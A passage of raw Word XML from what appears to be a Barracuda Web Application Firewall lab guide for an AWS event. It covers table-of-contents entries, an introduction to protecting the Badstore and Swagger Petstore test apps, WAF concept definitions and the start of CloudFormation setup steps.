                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995348 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66546F9B" w14:textId="229A5BFB"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49" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Further Tests</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995349 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="504A72C3" w14:textId="6E448C0D" w:rsidR="00E7077D" w:rsidRDefault="00BB5126">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="zh-TW"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76995350" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Advanced Application Security Tests</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995350 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53217A6E" w14:textId="398FB78C" w:rsidR="00E7077D" w:rsidRDefault="00BB5126">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:lang w:eastAsia="zh-TW"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc76995351" w:history="1">
            <w:r w:rsidR="00E7077D" w:rsidRPr="00B40B50">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Test X: API Security</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc76995351 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00E7077D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7836A9C9" w14:textId="4662B4C3" w:rsidR="004C4A1D" w:rsidRPr="00286DC0" w:rsidRDefault="004C4A1D">
          <w:r w:rsidRPr="00286DC0">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="4D915EDD" w14:textId="77777777" w:rsidR="00AD2AC8" w:rsidRPr="00286DC0" w:rsidRDefault="00AD2AC8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Semibold" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Semibold" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00286DC0">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D150FB" w14:textId="377D1D03" w:rsidR="004B1AEF" w:rsidRPr="00286DC0" w:rsidRDefault="003C36B7" w:rsidP="006545D1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc76995333"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00286DC0">
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="7634FDC3" w14:textId="76B3C07E" w:rsidR="009868F2" w:rsidRPr="00286DC0" w:rsidRDefault="003C36B7" w:rsidP="00947889">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r w:rsidRPr="00286DC0">
        <w:t>Welcome to the AWS Dev Day Barracuda WAF Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E099315" w14:textId="4478EC41" w:rsidR="008D27BA" w:rsidRPr="00286DC0" w:rsidRDefault="003C36B7" w:rsidP="008D27BA">
      <w:r w:rsidRPr="00286DC0">
        <w:t>In this lab you will learn how to protect vulnerable web applications with a Barracuda Web Application Firewall (WAF). You will deploy two vulnerable web applications and a Barracuda WAF. Each lesson will start with an introduction or a scenario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0C492F" w14:textId="68608C87" w:rsidR="003C36B7" w:rsidRPr="00286DC0" w:rsidRDefault="003C36B7" w:rsidP="008D27BA"/>
    <w:p w14:paraId="5AFC0C01" w14:textId="30F850EE" w:rsidR="003C36B7" w:rsidRPr="00286DC0" w:rsidRDefault="003C36B7" w:rsidP="008D27BA">
      <w:r w:rsidRPr="00286DC0">
        <w:t>The Barracuda Web Application Firewall is an enterprise-grade security device that is suitable for protecting virtually any web-based traffic. For more information about WAF features and functionality please visit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414581F1" w14:textId="40681A12" w:rsidR="003C36B7" w:rsidRPr="00286DC0" w:rsidRDefault="00BB5126" w:rsidP="008D27BA">
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="003C36B7" w:rsidRPr="00286DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Barracuda Web Application Firewall | Barracuda Networks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48EBDCD2" w14:textId="158145E2" w:rsidR="003C36B7" w:rsidRPr="00286DC0" w:rsidRDefault="003C36B7" w:rsidP="008D27BA"/>
    <w:p w14:paraId="1B62A49A" w14:textId="678DD3F1" w:rsidR="003C36B7" w:rsidRPr="00286DC0" w:rsidRDefault="00910C35" w:rsidP="008D27BA">
      <w:r w:rsidRPr="00286DC0">
        <w:t>Technical documentation can be found at Barracuda Campus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4708B71E" w14:textId="77777777" w:rsidR="00910C35" w:rsidRPr="00286DC0" w:rsidRDefault="00910C35" w:rsidP="008D27BA"/>
    <w:p w14:paraId="50353990" w14:textId="2F7FFE8F" w:rsidR="00910C35" w:rsidRPr="00286DC0" w:rsidRDefault="00BB5126" w:rsidP="00910C35">
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00910C35" w:rsidRPr="00286DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Barracuda Web Application Firewall | Barracuda Campus</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkStart w:id="2" w:name="_Toc7427111"/>
    </w:p>
    <w:p w14:paraId="5C5592DF" w14:textId="541D38C5" w:rsidR="00910C35" w:rsidRPr="00286DC0" w:rsidRDefault="00910C35" w:rsidP="00910C35"/>
    <w:p w14:paraId="62C3E489" w14:textId="695677EA" w:rsidR="00910C35" w:rsidRPr="00286DC0" w:rsidRDefault="00910C35" w:rsidP="00910C35">
      <w:r w:rsidRPr="00286DC0">
        <w:t>The vulnerable web applications deployed are</w:t>
      </w:r>
      <w:r w:rsidR="005C3C79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="005C3C79" w:rsidRPr="00C3368C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
          </w:rPr>
          <w:t>Badstore</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidR="00353A19">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">nd </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00286DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
          </w:rPr>
          <w:t xml:space="preserve">Swagger </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00286DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
          </w:rPr>
          <w:t>Petstore</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> (Open-API 3.0). Both applications are deployed on the same Linux EC2 instance running Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105C6679" w14:textId="532413C5" w:rsidR="008D27BA" w:rsidRPr="00286DC0" w:rsidRDefault="00613335" w:rsidP="006545D1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc76995334"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>WAF Concepts for the Lab</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="41130F9A" w14:textId="77777777" w:rsidR="00613335" w:rsidRPr="00286DC0" w:rsidRDefault="00613335" w:rsidP="00613335"/>
    <w:p w14:paraId="37BF4CB8" w14:textId="7C1E534C" w:rsidR="00613335" w:rsidRPr="00286DC0" w:rsidRDefault="00613335" w:rsidP="00613335">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Full Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326E72B0" w14:textId="674EF335" w:rsidR="00613335" w:rsidRPr="00286DC0" w:rsidRDefault="00613335" w:rsidP="00613335">
      <w:r w:rsidRPr="00286DC0">
        <w:t>WAF is a full</w:t>
      </w:r>
      <w:r w:rsidR="00CA2C16" w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00CA2C16" w:rsidRPr="00286DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
          </w:rPr>
          <w:t>reverse</w:t>
        </w:r>
        <w:r w:rsidRPr="00286DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
          </w:rPr>
          <w:t xml:space="preserve"> proxy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> located on an EC2 instance running in the VPC. It sits between the client (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>i.e.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> web browser) and backend server. The HTTP/S session between the client and WAF is separated from the HTTP/S session between WAF and the backend server</w:t>
      </w:r>
      <w:r w:rsidR="00CA2C16" w:rsidRPr="00286DC0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC88349" w14:textId="77777777" w:rsidR="00613335" w:rsidRPr="00286DC0" w:rsidRDefault="00613335" w:rsidP="00613335"/>
    <w:p w14:paraId="59B1078C" w14:textId="758A3BFF" w:rsidR="00613335" w:rsidRPr="00286DC0" w:rsidRDefault="00613335" w:rsidP="00613335">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Interface (or “Admin UI”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532CA2EA" w14:textId="48360E93" w:rsidR="00AC063D" w:rsidRPr="00286DC0" w:rsidRDefault="00AC063D" w:rsidP="00613335">
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">The web-based interface used to access and configure the WAF. Typically, this is accessed via HTTP on port 8000 or HTTPS on port 8443. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104F3778" w14:textId="4A0FA1E7" w:rsidR="00AC063D" w:rsidRPr="00286DC0" w:rsidRDefault="00AC063D" w:rsidP="00613335"/>
    <w:p w14:paraId="54C2F44E" w14:textId="3E71DF84" w:rsidR="00AC063D" w:rsidRPr="00286DC0" w:rsidRDefault="00AC063D" w:rsidP="00613335">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3198A671" w14:textId="577C4C03" w:rsidR="00AC063D" w:rsidRPr="00286DC0" w:rsidRDefault="00AC063D" w:rsidP="00613335">
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">A listener on the WAF. The WAF service will listen on a specific IP address and port for incoming web requests. The service has </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>a number of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> configuration options such as default request time, one or more TLS certificates, and whether or not to support </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00286DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
          </w:rPr>
          <w:t>Websockets</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00286DC0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A28A36" w14:textId="77777777" w:rsidR="00613335" w:rsidRPr="00286DC0" w:rsidRDefault="00613335" w:rsidP="00613335"/>
    <w:p w14:paraId="0DA17CB9" w14:textId="77777777" w:rsidR="00613335" w:rsidRPr="00286DC0" w:rsidRDefault="00613335" w:rsidP="00613335">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backend Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674079BF" w14:textId="13B303A3" w:rsidR="00613335" w:rsidRPr="00286DC0" w:rsidRDefault="008829B5" w:rsidP="00613335">
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">Sometimes called an “origin” server or a “real” server. This is the server or service that processes web traffic. Typically it is one or more web servers running </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00286DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
          </w:rPr>
          <w:t>Nginx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00286DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
          </w:rPr>
          <w:t>Apache</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00286DC0">
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00286DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
          </w:rPr>
          <w:t>IIS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00286DC0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559F330B" w14:textId="77777777" w:rsidR="007F6A37" w:rsidRPr="00286DC0" w:rsidRDefault="007F6A37" w:rsidP="00613335"/>
    <w:p w14:paraId="294BC1EA" w14:textId="7DD0271F" w:rsidR="00BF7E5A" w:rsidRPr="00286DC0" w:rsidRDefault="00BF7E5A" w:rsidP="00BF7E5A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5702"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passive Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B030D" w14:textId="3ED31BE1" w:rsidR="00BF7E5A" w:rsidRPr="00286DC0" w:rsidRDefault="00BF7E5A" w:rsidP="00BF7E5A">
      <w:r w:rsidRPr="00286DC0">
        <w:t>In passive mode the WAF will analyze and log attack traffic but will not take any action. This mode is useful for analyzing traffic without introducing false positives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7090E9C7" w14:textId="77777777" w:rsidR="00BF7E5A" w:rsidRPr="00286DC0" w:rsidRDefault="00BF7E5A" w:rsidP="00BF7E5A"/>
    <w:p w14:paraId="1C3B0E1E" w14:textId="643364E6" w:rsidR="00BF7E5A" w:rsidRPr="00286DC0" w:rsidRDefault="00BF7E5A" w:rsidP="00BF7E5A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5702"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20995BC6" w14:textId="65BE7B20" w:rsidR="00BF7E5A" w:rsidRPr="00286DC0" w:rsidRDefault="00BF7E5A" w:rsidP="00BF7E5A">
      <w:r w:rsidRPr="00286DC0">
        <w:t>WAF will actively block attacks and cloak insecure responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36627F14" w14:textId="77777777" w:rsidR="00BF7E5A" w:rsidRPr="00286DC0" w:rsidRDefault="00BF7E5A" w:rsidP="00BF7E5A"/>
    <w:p w14:paraId="49E7C8AF" w14:textId="77777777" w:rsidR="00BF7E5A" w:rsidRPr="00286DC0" w:rsidRDefault="00BF7E5A" w:rsidP="00BF7E5A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5702"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0AAE39" w14:textId="77777777" w:rsidR="00BF7E5A" w:rsidRPr="00286DC0" w:rsidRDefault="00BF7E5A" w:rsidP="00BF7E5A">
      <w:r w:rsidRPr="00286DC0">
        <w:t>Traffic logs consisting of every request processed by the WAF, regardless of whether it was allowed as legitimate or denied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CAB9F1" w14:textId="77777777" w:rsidR="00BF7E5A" w:rsidRPr="00286DC0" w:rsidRDefault="00BF7E5A" w:rsidP="00BF7E5A"/>
    <w:p w14:paraId="00A8AC97" w14:textId="09DDB1D9" w:rsidR="00613335" w:rsidRPr="00286DC0" w:rsidRDefault="00613335" w:rsidP="00613335">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00286DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Web Firewall Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FC7D98" w14:textId="1AC9F189" w:rsidR="00BD281E" w:rsidRPr="00286DC0" w:rsidRDefault="00BD281E" w:rsidP="00613335">
      <w:r w:rsidRPr="00286DC0">
        <w:lastRenderedPageBreak/>
        <w:t>Traffic logs consisting of every request that was blocked or cloaked by the WAF. All attacks stopped by the WAF are fully logged here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EBFD64" w14:textId="77777777" w:rsidR="00613335" w:rsidRDefault="00613335" w:rsidP="00613335"/>
    <w:p w14:paraId="04EDAB5F" w14:textId="2EB2D9B6" w:rsidR="0096587F" w:rsidRDefault="0096587F" w:rsidP="00613335">
      <w:r>
        <w:t>False Positive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067689E8" w14:textId="3A2643C8" w:rsidR="0096587F" w:rsidRPr="00286DC0" w:rsidRDefault="0096587F" w:rsidP="00613335">
      <w:r>
        <w:t>A legitimate request that was blocked</w:t>
      </w:r>
      <w:r w:rsidR="00AF32B1">
        <w:t xml:space="preserve"> or cloaked</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by the WAF.</w:t>
      </w:r>
      <w:r w:rsidR="00AF32B1">
        <w:t xml:space="preserve"> These are typically removed by fine-tuning the</w:t>
      </w:r>
      <w:r w:rsidR="006C0B06">
        <w:t xml:space="preserve"> WAF’s</w:t>
      </w:r>
      <w:r w:rsidR="00AF32B1">
        <w:t xml:space="preserve"> security settings</w:t>
      </w:r>
      <w:r w:rsidR="006C0B06">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C53380F" w14:textId="4F9A9674" w:rsidR="003650CA" w:rsidRPr="00286DC0" w:rsidRDefault="003650CA">
      <w:r w:rsidRPr="00286DC0">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C612B9D" w14:textId="2DD41CBD" w:rsidR="003650CA" w:rsidRPr="00286DC0" w:rsidRDefault="00B071B5" w:rsidP="003650CA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc76995335"/>
      <w:r w:rsidRPr="00286DC0">
        <w:lastRenderedPageBreak/>
        <w:t>Getting Started</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="029A4A93" w14:textId="77624D01" w:rsidR="005C3C44" w:rsidRPr="00286DC0" w:rsidRDefault="005C3C44" w:rsidP="005C3C44">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc76995336"/>
      <w:r w:rsidRPr="00286DC0">
        <w:t>Download the CloudFormation Template</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="564F0097" w14:textId="11310E1C" w:rsidR="00033EBE" w:rsidRPr="00286DC0" w:rsidRDefault="00033EBE" w:rsidP="005C3C44">
      <w:r w:rsidRPr="00286DC0">
        <w:t>Download the CloudFormation Template (CFT) for the deployment method you prefer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5241ED3A" w14:textId="2408ACC5" w:rsidR="00033EBE" w:rsidRPr="00286DC0" w:rsidRDefault="00BB5126" w:rsidP="00033EBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00033EBE" w:rsidRPr="00286DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
          </w:rPr>
          <w:t>Quickstart</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00033EBE" w:rsidRPr="00286DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI Light" w:hAnsi="Segoe UI Light"/>
          </w:rPr>
          <w:t xml:space="preserve"> Template</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00033EBE" w:rsidRPr="00286DC0">
        <w:t xml:space="preserve"> – Creates a new VPC and Subnet (Recommended method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D88499" w14:textId="145F5982" w:rsidR="00033EBE" w:rsidRPr="00286DC0" w:rsidRDefault="00BB5126" w:rsidP="00033EBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:history="1">
